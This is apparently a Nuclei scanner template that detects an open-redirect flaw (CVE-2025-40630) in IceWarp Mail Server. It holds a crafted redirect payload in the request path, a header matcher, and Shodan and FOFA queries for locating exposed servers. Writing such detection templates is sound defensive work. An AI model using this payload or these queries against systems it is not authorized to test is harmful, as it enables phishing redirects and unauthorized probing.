id: CVE-2025-40630 info: name: IceWarp Mail Server ≤11.4.0 - Open Redirect author: DhiyaneshDK severity: medium description: | IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs. impact: | An attacker can craft malicious URLs to redirect users to external malicious websites, potentially leading to phishing attacks or credential theft. remediation: | Update IceWarp Mail Server to a version newer than 11.4.0. Implement proper URL validation and restrict redirects to trusted domains only. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-40630 - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-icewarp-mail-server classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-40630 cwe-id: CWE-601 epss-score: 0.00764 epss-percentile: 0.73787 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: icewarp product: mail_server shodan-query: 'http.title:"IceWarp"' fofa-query: 'title="IceWarp"' google-query: intitle:"icewarp" tags: cve,cve2025,icewarp,redirect,open-redirect,vuln http: - method: GET path: - "{{BaseURL}}/%2f%5c%2foast.pro%2f.." matchers-condition: and matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' - type: status status: - 302 # digest: 490a0046304402206faa886541d3616e6843b808c307e5b037715d83b6f55ef90ae647b53145e59d022004cda55e7c7027e6214c2d9e15af3ba57a5b1104e56b3b6bf18a3cc10816a587:922c64590222798bb761d5b6d8e72950